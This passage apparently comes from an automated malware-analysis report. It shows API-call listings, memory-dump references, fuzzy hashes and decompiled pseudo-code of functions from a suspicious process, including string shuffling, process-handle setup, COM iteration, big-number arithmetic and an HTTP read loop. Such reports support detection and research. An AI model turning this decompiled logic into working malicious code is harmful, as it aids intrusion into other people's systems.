                                • memcpy.NTDLL(052F4A23,052F70D9,00000010,?,?,?,052F4A23,00000001,052F70D9,00000000,?,052F62B1,00000000,052F70D9,?,00000000), ref: 052F3A16
                                • memcpy.NTDLL(00000000,00000000,07459630,00000010), ref: 052F3AA9
                                • GetLastError.KERNEL32(?,?,00000010), ref: 052F3B01
                                • GetLastError.KERNEL32 ref: 052F3B33
                                • GetLastError.KERNEL32 ref: 052F3B47
                                • GetLastError.KERNEL32(?,?,?,052F4A23,00000001,052F70D9,00000000,?,052F62B1,00000000,052F70D9,?,00000000,052F70D9,00000000,07459630), ref: 052F3B5C
                                Memory Dump Source
                                • Source File: 00000006.00000002.409924400.00000000052F1000.00000020.00000001.sdmp, Offset: 052F0000, based on PE: true
                                • Associated: 00000006.00000002.409916806.00000000052F0000.00000004.00000001.sdmp
                                • Associated: 00000006.00000002.409937275.00000000052F9000.00000002.00000001.sdmp
                                • Associated: 00000006.00000002.409958443.00000000052FA000.00000004.00000001.sdmp
                                • Associated: 00000006.00000002.409970762.00000000052FC000.00000002.00000001.sdmp
                                Similarity
                                • API ID: ErrorLast$memcpy
                                • String ID:
                                • API String ID: 2760375183-0
                                • Opcode ID: feb8ee493680d488746abd89d70a06687d9ab9cec7c797df970922d55ff73142
                                • Instruction ID: 920c41504d289b82b368a70f12ff1d46cdbd79207d627724bebb0bed023a9854
                                • Opcode Fuzzy Hash: feb8ee493680d488746abd89d70a06687d9ab9cec7c797df970922d55ff73142
                                • Instruction Fuzzy Hash: C5513B71924209FFDF10DFA5E889AAEBBB9FF14350F008439FA05E6240D7719A549B61
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 22%
                                			E052F2A23(signed int __eax, signed int _a4, signed int _a8) {
                                				signed int _v8;
                                				signed int _v12;
                                				intOrPtr _v16;
                                				signed int _v20;
                                				intOrPtr _t81;
                                				char _t83;
                                				signed int _t90;
                                				signed int _t97;
                                				signed int _t99;
                                				char _t101;
                                				unsigned int _t102;
                                				intOrPtr _t103;
                                				char* _t107;
                                				signed int _t110;
                                				signed int _t113;
                                				signed int _t118;
                                				signed int _t122;
                                				intOrPtr _t124;
                                
                                				_t102 = _a8;
                                				_t118 = 0;
                                				_v20 = __eax;
                                				_t122 = (_t102 >> 2) + 1;
                                				_v8 = 0;
                                				_a8 = 0;
                                				_t81 = E052F6837(_t122 << 2);
                                				_v16 = _t81;
                                				if(_t81 == 0) {
                                					_push(8);
                                					_pop(0);
                                					L37:
                                					return 0;
                                				}
                                				_t107 = _a4;
                                				_a4 = _t102;
                                				_t113 = 0;
                                				while(1) {
                                					_t83 =  *_t107;
                                					if(_t83 == 0) {
                                						break;
                                					}
                                					if(_t83 == 0xd || _t83 == 0xa) {
                                						if(_t118 != 0) {
                                							if(_t118 > _v8) {
                                								_v8 = _t118;
                                							}
                                							_a8 = _a8 + 1;
                                							_t118 = 0;
                                						}
                                						 *_t107 = 0;
                                						goto L16;
                                					} else {
                                						if(_t118 != 0) {
                                							L10:
                                							_t118 = _t118 + 1;
                                							L16:
                                							_t107 = _t107 + 1;
                                							_t15 =  &_a4;
                                							 *_t15 = _a4 - 1;
                                							if( *_t15 != 0) {
                                								continue;
                                							}
                                							break;
                                						}
                                						if(_t113 == _t122) {
                                							L21:
                                							if(_a8 <= 0x20) {
                                								_push(0xb);
                                								L34:
                                								_pop(0);
                                								L35:
                                								E052F50CA(_v16);
                                								goto L37;
                                							}
                                							_t103 = E052F6837((_v8 + _v8 + 5) * _a8 + 4);
                                							if(_t103 == 0) {
                                								_push(8);
                                								goto L34;
                                							}
                                							_t90 = _a8;
                                							_a4 = _a4 & 0x00000000;
                                							_v8 = _v8 & 0x00000000;
                                							_t124 = _t103 + _t90 * 4;
                                							if(_t90 <= 0) {
                                								L31:
                                								 *0x52fa2cc = _t103;
                                								goto L35;
                                							}
                                							do {
                                								_t110 = 0x3c6ef35f + _v20 * 0x19660d;
                                								_v20 = 0x3c6ef35f + _t110 * 0x19660d;
                                								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4)));
                                								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4)));
                                								_v12 = _v12 & 0x00000000;
                                								if(_a4 <= 0) {
                                									goto L30;
                                								} else {
                                									goto L26;
                                								}
                                								while(1) {
                                									L26:
                                									_t99 = _v12;
                                									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124);
                                									if(_t99 == 0) {
                                										break;
                                									}
                                									_v12 = _v12 + 1;
                                									if(_v12 < _a4) {
                                										continue;
                                									}
                                									goto L30;
                                								}
                                								_v8 = _v8 - 1;
                                								L30:
                                								_t97 = _a4;
                                								_a4 = _a4 + 1;
                                								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;
                                								__imp__(_t124);
                                								_v8 = _v8 + 1;
                                								_t124 = _t124 + _t97 + 1;
                                							} while (_v8 < _a8);
                                							goto L31;
                                						}
                                						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107;
                                						_t101 = _t83;
                                						if(_t83 - 0x61 <= 0x19) {
                                							_t101 = _t101 - 0x20;
                                						}
                                						 *_t107 = _t101;
                                						_t113 = _t113 + 1;
                                						goto L10;
                                					}
                                				}
                                				if(_t118 != 0) {
                                					if(_t118 > _v8) {
                                						_v8 = _t118;
                                					}
                                					_a8 = _a8 + 1;
                                				}
                                				goto L21;
                                			}






















                                APIs
                                  • Part of subcall function 052F6837: RtlAllocateHeap.NTDLL(00000000,00000000,052F4197), ref: 052F6843
                                • lstrcpy.KERNEL32(63699BC4,00000020), ref: 052F2B20
                                • lstrcat.KERNEL32(63699BC4,00000020), ref: 052F2B35
                                • lstrcmp.KERNEL32(00000000,63699BC4), ref: 052F2B4C
                                • lstrlen.KERNEL32(63699BC4), ref: 052F2B70
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.409924400.00000000052F1000.00000020.00000001.sdmp, Offset: 052F0000, based on PE: true
                                • Associated: 00000006.00000002.409916806.00000000052F0000.00000004.00000001.sdmp
                                • Associated: 00000006.00000002.409937275.00000000052F9000.00000002.00000001.sdmp
                                • Associated: 00000006.00000002.409958443.00000000052FA000.00000004.00000001.sdmp
                                • Associated: 00000006.00000002.409970762.00000000052FC000.00000002.00000001.sdmp
                                Similarity
                                • API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
                                • String ID:
                                • API String ID: 3214092121-3916222277
                                • Opcode ID: 7ab6710287f809fe4ac99287e85646a51b8e8278afa0eaf40dbb1e6dc43f4035
                                • Instruction ID: 0e35061509d32aa94b30bdd66cf7b1b070452dd13718a2dcd72c9aabc41c0ad2
                                • Opcode Fuzzy Hash: 7ab6710287f809fe4ac99287e85646a51b8e8278afa0eaf40dbb1e6dc43f4035
                                • Instruction Fuzzy Hash: B051A035A14109EFDB21CF99E984BADFBB6FF46310F04806AEE19AB241C7709641CF90
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E052F4C1B(intOrPtr _a4) {
                                				void* _t2;
                                				long _t4;
                                				void* _t5;
                                				long _t6;
                                				void* _t7;
                                
                                				_t2 = CreateEventA(0, 1, 0, 0);
                                				 *0x52fa2c4 = _t2;
                                				if(_t2 == 0) {
                                					return GetLastError();
                                				}
                                				_t4 = GetVersion();
                                				if(_t4 <= 5) {
                                					_t5 = 0x32;
                                					return _t5;
                                				}
                                				 *0x52fa2b4 = _t4;
                                				_t6 = GetCurrentProcessId();
                                				 *0x52fa2b0 = _t6;
                                				 *0x52fa2bc = _a4;
                                				_t7 = OpenProcess(0x10047a, 0, _t6);
                                				 *0x52fa2ac = _t7;
                                				if(_t7 == 0) {
                                					 *0x52fa2ac =  *0x52fa2ac | 0xffffffff;
                                				}
                                				return 0;
                                			}

                                APIs
                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,052F6B4E,?,?,00000001), ref: 052F4C23
                                • GetVersion.KERNEL32(?,00000001), ref: 052F4C32
                                • GetCurrentProcessId.KERNEL32(?,00000001), ref: 052F4C41
                                • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000001), ref: 052F4C5E
                                • GetLastError.KERNEL32(?,00000001), ref: 052F4C7D
                                Memory Dump Source
                                • Source File: 00000006.00000002.409924400.00000000052F1000.00000020.00000001.sdmp, Offset: 052F0000, based on PE: true
                                • Associated: 00000006.00000002.409916806.00000000052F0000.00000004.00000001.sdmp
                                • Associated: 00000006.00000002.409937275.00000000052F9000.00000002.00000001.sdmp
                                • Associated: 00000006.00000002.409958443.00000000052FA000.00000004.00000001.sdmp
                                • Associated: 00000006.00000002.409970762.00000000052FC000.00000002.00000001.sdmp
                                Similarity
                                • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                                • String ID:
                                • API String ID: 2270775618-0
                                • Opcode ID: 9be8762e6d070a2c124a27723b34967267bd95eca19ca140f07b762d3b108325
                                • Instruction ID: 70efed6992000604311a8cbdca1772c30c530897545158c017e55caaa2b7eb75
                                • Opcode Fuzzy Hash: 9be8762e6d070a2c124a27723b34967267bd95eca19ca140f07b762d3b108325
                                • Instruction Fuzzy Hash: CDF0F971775301AFEB109F64B80EF1A7E65AF047A4F005539F64AC51D0DBB24080CF15
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • SysAllocString.OLEAUT32(00000000), ref: 052F165B
                                • SysFreeString.OLEAUT32(00000000), ref: 052F173E
                                  • Part of subcall function 052F6C6D: SysAllocString.OLEAUT32(052F92B0), ref: 052F6CBD
                                • SafeArrayDestroy.OLEAUT32(?), ref: 052F1792
                                • SysFreeString.OLEAUT32(?), ref: 052F17A0
                                  • Part of subcall function 052F1FC2: Sleep.KERNEL32(000001F4), ref: 052F200A
                                Memory Dump Source
                                • Source File: 00000006.00000002.409924400.00000000052F1000.00000020.00000001.sdmp, Offset: 052F0000, based on PE: true
                                • Associated: 00000006.00000002.409916806.00000000052F0000.00000004.00000001.sdmp
                                • Associated: 00000006.00000002.409937275.00000000052F9000.00000002.00000001.sdmp
                                • Associated: 00000006.00000002.409958443.00000000052FA000.00000004.00000001.sdmp
                                • Associated: 00000006.00000002.409970762.00000000052FC000.00000002.00000001.sdmp
                                Similarity
                                • API ID: String$AllocFree$ArrayDestroySafeSleep
                                • String ID:
                                • API String ID: 3193056040-0
                                • Opcode ID: 2b59d7a8a31f112049bf24c4415c2f3d599c877038140a7abaac92171e83efec
                                • Instruction ID: 5fee0d53caa5c36ab14d01e79e2697d4595dfb41110af18c968f37c2c1daa9f1
                                • Opcode Fuzzy Hash: 2b59d7a8a31f112049bf24c4415c2f3d599c877038140a7abaac92171e83efec
                                • Instruction Fuzzy Hash: BA510375A10249EFCB00DFE8E8848AEF7B6FF88350B544479E60AD7250DB35AD55CB50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 46%
                                			E052F6C6D(intOrPtr* __eax) {
                                				void* _v8;
                                				WCHAR* _v12;
                                				void* _v16;
                                				char _v20;
                                				void* _v24;
                                				intOrPtr _v28;
                                				void* _v32;
                                				intOrPtr _v40;
                                				short _v48;
                                				intOrPtr _v56;
                                				short _v64;
                                				intOrPtr* _t54;
                                				intOrPtr* _t56;
                                				intOrPtr _t57;
                                				intOrPtr* _t58;
                                				intOrPtr* _t60;
                                				void* _t61;
                                				intOrPtr* _t63;
                                				intOrPtr* _t65;
                                				intOrPtr* _t67;
                                				intOrPtr* _t69;
                                				intOrPtr* _t71;
                                				intOrPtr* _t74;
                                				intOrPtr* _t76;
                                				intOrPtr _t78;
                                				intOrPtr* _t82;
                                				intOrPtr* _t86;
                                				intOrPtr _t102;
                                				intOrPtr _t108;
                                				void* _t117;
                                				void* _t121;
                                				void* _t122;
                                				intOrPtr _t129;
                                
                                				_t122 = _t121 - 0x3c;
                                				_push( &_v8);
                                				_push(__eax);
                                				_t117 =  *((intOrPtr*)( *__eax + 0x48))();
                                				if(_t117 >= 0) {
                                					_t54 = _v8;
                                					_t102 =  *0x52fa2d4; // 0x215d5a8
                                					_t5 = _t102 + 0x52fb038; // 0x3050f485
                                					_t117 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
                                					_t56 = _v8;
                                					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
                                					if(_t117 >= 0) {
                                						__imp__#2(0x52f92b0);
                                						_v28 = _t57;
                                						if(_t57 == 0) {
                                							_t117 = 0x8007000e;
                                						} else {
                                							_t60 = _v32;
                                							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
                                							_t86 = __imp__#6;
                                							_t117 = _t61;
                                							if(_t117 >= 0) {
                                								_t63 = _v24;
                                								_t117 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
                                								if(_t117 >= 0) {
                                									_t129 = _v20;
                                									if(_t129 != 0) {
                                										_v64 = 3;
                                										_v48 = 3;
                                										_v56 = 0;
                                										_v40 = 0;
                                										if(_t129 > 0) {
                                											while(1) {
                                												_t67 = _v24;
                                												asm("movsd");
                                												asm("movsd");
                                												asm("movsd");
                                												asm("movsd");
                                												_t122 = _t122;
                                												asm("movsd");
                                												asm("movsd");
                                												asm("movsd");
                                												asm("movsd");
                                												_t117 =  *((intOrPtr*)( *_t67 + 0x2c))(_t67,  &_v8);
                                												if(_t117 < 0) {
                                													goto L16;
                                												}
                                												_t69 = _v8;
                                												_t108 =  *0x52fa2d4; // 0x215d5a8
                                												_t28 = _t108 + 0x52fb0bc; // 0x3050f1ff
                                												_t117 =  *((intOrPtr*)( *_t69))(_t69, _t28,  &_v16);
                                												if(_t117 >= 0) {
                                													_t74 = _v16;
                                													_t117 =  *((intOrPtr*)( *_t74 + 0x34))(_t74,  &_v12);
                                													if(_t117 >= 0 && _v12 != 0) {
                                														_t78 =  *0x52fa2d4; // 0x215d5a8
                                														_t33 = _t78 + 0x52fb078; // 0x76006f
                                														if(lstrcmpW(_v12, _t33) == 0) {
                                															_t82 = _v16;
                                															 *((intOrPtr*)( *_t82 + 0x114))(_t82);
                                														}
                                														 *_t86(_v12);
                                													}
                                													_t76 = _v16;
                                													 *((intOrPtr*)( *_t76 + 8))(_t76);
                                												}
                                												_t71 = _v8;
                                												 *((intOrPtr*)( *_t71 + 8))(_t71);
                                												_v40 = _v40 + 1;
                                												if(_v40 < _v20) {
                                													continue;
                                												}
                                												goto L16;
                                											}
                                										}
                                									}
                                								}
                                								L16:
                                								_t65 = _v24;
                                								 *((intOrPtr*)( *_t65 + 8))(_t65);
                                							}
                                							 *_t86(_v28);
                                						}
                                						_t58 = _v32;
                                						 *((intOrPtr*)( *_t58 + 8))(_t58);
                                					}
                                				}
                                				return _t117;
                                			}

                                APIs
                                • SysAllocString.OLEAUT32(052F92B0), ref: 052F6CBD
                                • lstrcmpW.KERNEL32(00000000,0076006F), ref: 052F6D9F
                                • SysFreeString.OLEAUT32(00000000), ref: 052F6DB8
                                • SysFreeString.OLEAUT32(?), ref: 052F6DE7
                                Memory Dump Source
                                • Source File: 00000006.00000002.409924400.00000000052F1000.00000020.00000001.sdmp, Offset: 052F0000, based on PE: true
                                • Associated: 00000006.00000002.409916806.00000000052F0000.00000004.00000001.sdmp
                                • Associated: 00000006.00000002.409937275.00000000052F9000.00000002.00000001.sdmp
                                • Associated: 00000006.00000002.409958443.00000000052FA000.00000004.00000001.sdmp
                                • Associated: 00000006.00000002.409970762.00000000052FC000.00000002.00000001.sdmp
                                Similarity
                                • API ID: String$Free$Alloclstrcmp
                                • String ID:
                                • API String ID: 1885612795-0
                                • Opcode ID: 848799e389613eb0d2dbe51ca4d671f705454117647ed2f7c10f98a22f16d50d
                                • Instruction ID: 916fab55c872ba5b5ab3aeda42545e115ae6b104490a7bde5a15460dddbd5049
                                • Opcode Fuzzy Hash: 848799e389613eb0d2dbe51ca4d671f705454117647ed2f7c10f98a22f16d50d
                                • Instruction Fuzzy Hash: FD516075E0051AEFCB00DFA8D4889AEF7B5FF89304B1445A9E916EB214DB31AD41CBA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 85%
                                			E052F5D93(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
                                				intOrPtr _v8;
                                				intOrPtr _v12;
                                				signed int _v16;
                                				void _v156;
                                				void _v428;
                                				void* _t55;
                                				unsigned int _t56;
                                				signed int _t66;
                                				signed int _t74;
                                				void* _t76;
                                				signed int _t79;
                                				void* _t81;
                                				void* _t92;
                                				void* _t96;
                                				signed int* _t99;
                                				signed int _t101;
                                				signed int _t103;
                                				void* _t107;
                                
                                				_t92 = _a12;
                                				_t101 = __eax;
                                				_t55 = E052F28F1(_a16, _t92);
                                				_t79 = _t55;
                                				if(_t79 == 0) {
                                					L18:
                                					return _t55;
                                				}
                                				_t56 =  *(_t92 + _t79 * 4 - 4);
                                				_t81 = 0;
                                				_t96 = 0x20;
                                				if(_t56 == 0) {
                                					L4:
                                					_t97 = _t96 - _t81;
                                					_v12 = _t96 - _t81;
                                					E052F1000(_t79,  &_v428);
                                					 *((intOrPtr*)(_t107 + _t101 * 4 - 0x1a8)) = E052F3915(_t101,  &_v428, _a8, _t96 - _t81);
                                					E052F3915(_t79,  &_v156, _a12, _t97);
                                					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x9c));
                                					_t66 = E052F1000(_t101, 0x52fa188);
                                					_t103 = _t101 - _t79;
                                					_a8 = _t103;
                                					if(_t103 < 0) {
                                						L17:
                                						E052F1000(_a16, _a4);
                                						E052F3B6F(_t79,  &_v428, _a4, _t97);
                                						memset( &_v428, 0, 0x10c);
                                						_t55 = memset( &_v156, 0, 0x84);
                                						goto L18;
                                					}
                                					_t99 = _t107 + (_t103 + _t79) * 4 - 0x1a8;
                                					do {
                                						if(_v8 != 0xffffffff) {
                                							_push(1);
                                							_push(0);
                                							_push(0);
                                							_push( *_t99);
                                							L052F7D8C();
                                							_t74 = _t66 +  *(_t99 - 4);
                                							asm("adc edx, esi");
                                							_push(0);
                                							_push(_v8 + 1);
                                							_push(_t92);
                                							_push(_t74);
                                							L052F7D86();
                                							if(_t92 > 0 || _t74 > 0xffffffff) {
                                								_t74 = _t74 | 0xffffffff;
                                								_v16 = _v16 & 0x00000000;
                                							}
                                						} else {
                                							_t74 =  *_t99;
                                						}
                                						_t106 = _t107 + _a8 * 4 - 0x1a8;
                                						_a12 = _t74;
                                						_t76 = E052F679F(_t79,  &_v156, _t92, _t107 + _a8 * 4 - 0x1a8, _t107 + _a8 * 4 - 0x1a8, _t74);
                                						while(1) {
                                							 *_t99 =  *_t99 - _t76;
                                							if( *_t99 != 0) {
                                								goto L14;
                                							}
                                							L13:
                                							_t92 =  &_v156;
                                							if(E052F5AC5(_t79, _t92, _t106) < 0) {
                                								break;
                                							}
                                							L14:
                                							_a12 = _a12 + 1;
                                							_t76 = E052F4A54(_t79,  &_v156, _t106, _t106);
                                							 *_t99 =  *_t99 - _t76;
                                							if( *_t99 != 0) {
                                								goto L14;
                                							}
                                							goto L13;
                                						}
                                						_a8 = _a8 - 1;
                                						_t66 = _a12;
                                						_t99 = _t99 - 4;
                                						 *(0x52fa188 + _a8 * 4) = _t66;
                                					} while (_a8 >= 0);
                                					_t97 = _v12;
                                					goto L17;
                                				}
                                				while(_t81 < _t96) {
                                					_t81 = _t81 + 1;
                                					_t56 = _t56 >> 1;
                                					if(_t56 != 0) {
                                						continue;
                                					}
                                					goto L4;
                                				}
                                				goto L4;
                                			}

                                APIs
                                • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 052F5E46
                                • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 052F5E5C
                                • memset.NTDLL ref: 052F5F05
                                • memset.NTDLL ref: 052F5F1B
                                Memory Dump Source
                                • Source File: 00000006.00000002.409924400.00000000052F1000.00000020.00000001.sdmp, Offset: 052F0000, based on PE: true
                                • Associated: 00000006.00000002.409916806.00000000052F0000.00000004.00000001.sdmp
                                • Associated: 00000006.00000002.409937275.00000000052F9000.00000002.00000001.sdmp
                                • Associated: 00000006.00000002.409958443.00000000052FA000.00000004.00000001.sdmp
                                • Associated: 00000006.00000002.409970762.00000000052FC000.00000002.00000001.sdmp
                                Similarity
                                • API ID: memset$_allmul_aulldiv
                                • String ID:
                                • API String ID: 3041852380-0
                                • Opcode ID: 1ab6e85a11569902bb111167c99d391f44e4c98313cc42f9ebaaba6106c404a3
                                • Instruction ID: fd1c807927f7629774091cdede3f87394edb7b72a1345885846c6dc42227d215
                                • Opcode Fuzzy Hash: 1ab6e85a11569902bb111167c99d391f44e4c98313cc42f9ebaaba6106c404a3
                                • Instruction Fuzzy Hash: 2141B231B20219AFDB20DF68EC48FEEB775EF45710F104579BA19A7280DB70AE558B90
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 57%
                                			E052F14A8(void* __eax) {
                                				long _v8;
                                				char _v12;
                                				char _v16;
                                				intOrPtr _v20;
                                				void* _v24;
                                				void* __esi;
                                				void* _t41;
                                				char* _t42;
                                				long _t43;
                                				intOrPtr _t47;
                                				intOrPtr* _t48;
                                				char _t50;
                                				char* _t55;
                                				long _t56;
                                				intOrPtr* _t57;
                                				void* _t60;
                                				void* _t61;
                                				void* _t68;
                                				void* _t72;
                                				void* _t73;
                                				void* _t74;
                                				void* _t78;
                                
                                				_t72 = __eax;
                                				if( *((intOrPtr*)(__eax + 0xc)) != 0) {
                                					L2:
                                					_t41 = _t72;
                                					_pop(_t73);
                                					_t74 = _t41;
                                					_t42 =  &_v12;
                                					_v8 = 0;
                                					_v16 = 0;
                                					__imp__( *((intOrPtr*)(_t74 + 0x18)), _t42, _t68, _t73, _t61, _t78);
                                					if(_t42 == 0) {
                                						_t43 = GetLastError();
                                						_v8 = _t43;
                                						if(_t43 == 0x2efe) {
                                							_v8 = 0;
                                							goto L29;
                                						}
                                					} else {
                                						if(_v12 == 0) {
                                							L29:
                                							 *((intOrPtr*)(_t74 + 0x30)) = 0;
                                						} else {
                                							_push( &_v24);
                                							_push(1);
                                							_push(0);
                                							if( *0x52fa144() != 0) {
                                								_v8 = 8;
                                							} else {
                                								_t47 = E052F6837(0x1000);
                                								_v20 = _t47;
                                								if(_t47 == 0) {
                                									_v8 = 8;
                                								} else {
                                									goto L8;
                                									do {
                                										while(1) {
                                											L8:
                                											_t50 = _v12;
                                											if(_t50 >= 0x1000) {
                                												_t50 = 0x1000;
                                											}
                                											__imp__( *((intOrPtr*)(_t74 + 0x18)), _v20, _t50,  &_v16);
                                											if(_t50 == 0) {
                                												break;
                                											}
                                											_t57 = _v24;
                                											 *((intOrPtr*)( *_t57 + 0x10))(_t57, _v20, _v16, 0);
                                											_t18 =  &_v12;
                                											 *_t18 = _v12 - _v16;
                                											if( *_t18 != 0) {
                                												continue;
                                											} else {
                                											}
                                											L14:
                                											if(WaitForSingleObject( *0x52fa2c4, 0) != 0x102) {
                                												_v8 = 0x102;
                                											} else {
                                												_t55 =  &_v12;
                                												__imp__( *((intOrPtr*)(_t74 + 0x18)), _t55);
                                												if(_t55 != 0) {
                                													goto L19;
                                												} else {
                                													_t56 = GetLastError();
                                													_v8 = _t56;
                                													if(_t56 == 0x2f78 && _v12 == 0) {
                                														_v8 = 0;
                                														goto L19;
                                													}
                                												}
                                											}
                                											L22:
                                											E052F50CA(_v20);
                                											if(_v8 == 0) {
                                												_v8 = E052F37FC(_v24, _t74);
                                											}
                                											goto L25;
                                										}
                                										_v8 = GetLastError();
                                										goto L14;
                                										L19:
                                									} while (_v12 != 0);
                                									goto L22;
                                								}
                                								L25:
                                								_t48 = _v24;
                                								 *((intOrPtr*)( *_t48 + 8))(_t48);
                                							}
                                						}
                                					}
                                					return _v8;
                                				} else {
                                					_t60 = E052F25C7(__eax);
                                					if(_t60 != 0) {
                                						return _t60;
                                					} else {
                                						goto L2;
                                					}
                                				}
                                			}

                                APIs
                                • WaitForSingleObject.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,052F7134,00000000,?), ref: 052F5B9B
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,052F7134,00000000,?,?), ref: 052F5BBB
                                  • Part of subcall function 052F25C7: wcstombs.NTDLL ref: 052F2687
                                Memory Dump Source
                                • Source File: 00000006.00000002.409924400.00000000052F1000.00000020.00000001.sdmp, Offset: 052F0000, based on PE: true
                                • Associated: 00000006.00000002.409916806.00000000052F0000.00000004.00000001.sdmp
                                • Associated: 00000006.00000002.409937275.00000000052F9000.00000002.00000001.sdmp
                                • Associated: 00000006.00000002.409958443.00000000052FA000.00000004.00000001.sdmp
                                • Associated: 00000006.00000002.409970762.00000000052FC000.00000002.00000001.sdmp
                                Similarity
                                • API ID: ErrorLastObjectSingleWaitwcstombs
                                • String ID:
                                • API String ID: 2344289193-0
                                • Opcode ID: a244645d3585773fa45972b7700847008328fb32f841037ee9cadf4d88fd2bd4
                                • Instruction ID: 8882316caae74f75cec8b57a96b7a634b1ed15ef87be1ab767fa0d04069b9751
                                • Opcode Fuzzy Hash: a244645d3585773fa45972b7700847008328fb32f841037ee9cadf4d88fd2bd4
                                • Instruction Fuzzy Hash: 8E411975A2120AEFDF10DFA4F988AADFBBAFF05254F104479E606E6140D7709A80DB60
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • SysAllocString.OLEAUT32(80000002), ref: 052F5C8C
                                • SysAllocString.OLEAUT32(052F1E05), ref: 052F5CCF
                                • SysFreeString.OLEAUT32(00000000), ref: 052F5CE3
                                • SysFreeString.OLEAUT32(00000000), ref: 052F5CF1
                                Memory Dump Source
                                • Source File: 00000006.00000002.409924400.00000000052F1000.00000020.00000001.sdmp, Offset: 052F0000, based on PE: true
                                • Associated: 00000006.00000002.409916806.00000000052F0000.00000004.00000001.sdmp
                                • Associated: 00000006.00000002.409937275.00000000052F9000.00000002.00000001.sdmp
                                • Associated: 00000006.00000002.409958443.00000000052FA000.00000004.00000001.sdmp
                                • Associated: 00000006.00000002.409970762.00000000052FC000.00000002.00000001.sdmp
                                Similarity
                                • API ID: String$AllocFree
                                • String ID:
                                • API String ID: 344208780-0
                                • Opcode ID: bd1738bdeaa573682117c11a6527fcc096e7e3defaa2a3cc26cf61cab1e8138c
                                • Instruction ID: 1e9469e12f3c01c4a45b1e4c536b7f497eb1f1c2d2b4a24916b1cd04716e2a03
                                • Opcode Fuzzy Hash: bd1738bdeaa573682117c11a6527fcc096e7e3defaa2a3cc26cf61cab1e8138c
                                • Instruction Fuzzy Hash: 20313D76A2010AEFCB05CF98E4C48AEBBB5FF48304B10843EF60A97250DB759585CF61
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 87%
                                			E052F73C3(signed int _a4, signed int* _a8) {
                                				void* __ecx;
                                				void* __edi;
                                				signed int _t6;
                                				intOrPtr _t8;
                                				intOrPtr _t12;
                                				void* _t25;
                                				void* _t26;
                                				signed int* _t27;
                                				signed short* _t28;
                                				CHAR* _t30;
                                				long _t31;
                                				intOrPtr* _t32;
                                
                                				_t6 =  *0x52fa2c8; // 0xbd092303
                                				_t32 = _a4;
                                				_a4 = _t6 ^ 0xd05b5869;
                                				_t8 =  *0x52fa2d4; // 0x215d5a8
                                				_t3 = _t8 + 0x52fb8a2; // 0x61636f4c
                                				_t25 = 0;
                                				_t30 = E052F2DEA(_t3, 1);
                                				if(_t30 != 0) {
                                					_t25 = CreateEventA(0x52fa2f8, 1, 0, _t30);
                                					E052F50CA(_t30);
                                				}
                                				_t12 =  *0x52fa2b4; // 0x4000000a
                                				if(_t12 != 6 || _t12 < 2) {
                                					if( *_t32 != 0 && E052F513E() == 0) {
                                						_t28 =  *0x52fa120( *_t32, 0x20);
                                						if(_t28 != 0) {
                                							 *_t28 =  *_t28 & 0x00000000;
                                							_t28 =  &(_t28[1]);
                                						}
                                						_t31 = E052F6BE1(0, _t28,  *_t32, 0);
                                						if(_t31 == 0) {
                                							if(_t25 == 0) {
                                								goto L21;
                                							}
                                							_t31 = WaitForSingleObject(_t25, 0x4e20);
                                							if(_t31 == 0) {
                                								goto L19;
                                							}
                                						}
                                					}
                                					goto L11;
                                				} else {
                                					L11:
                                					_t27 = _a8;
                                					if(_t27 != 0) {
                                						 *_t27 =  *_t27 | 0x00000001;
                                					}
                                					_t31 = E052F51A8(_t32, _t26);
                                					if(_t31 == 0 && _t25 != 0) {
                                						_t31 = WaitForSingleObject(_t25, 0x4e20);
                                					}
                                					if(_t27 != 0 && _t31 != 0) {
                                						 *_t27 =  *_t27 & 0xfffffffe;
                                					}
                                					L19:
                                					if(_t25 != 0) {
                                						CloseHandle(_t25);
                                					}
                                					L21:
                                					return _t31;
                                				}
                                			}

                                APIs
                                  • Part of subcall function 052F2DEA: lstrlen.KERNEL32(E8FA7DD7,00000000,63699BC3,00000027,00000000,07459C98,74ECC740,052F55DE,?,63699BC3,E8FA7DD7,00000000,?,?,?,052F55DE), ref: 052F2E20
                                  • Part of subcall function 052F2DEA: lstrcpy.KERNEL32(00000000,00000000), ref: 052F2E44
                                  • Part of subcall function 052F2DEA: lstrcat.KERNEL32(00000000,00000000), ref: 052F2E4C
                                • CreateEventA.KERNEL32(052FA2F8,00000001,00000000,00000000,61636F4C,00000001,00000000,?,?,00000000,?,052F30E1,?,?,?), ref: 052F7402
                                  • Part of subcall function 052F50CA: HeapFree.KERNEL32(00000000,00000000,052F4239,00000000,00000001,?,00000000,?,?,?,052F6B8D,00000000,?,00000001), ref: 052F50D6
                                • WaitForSingleObject.KERNEL32(00000000,00004E20,052F30E1,00000000,?,00000000,?,052F30E1,?,?,?,?,?,?,?,052F211B), ref: 052F7460
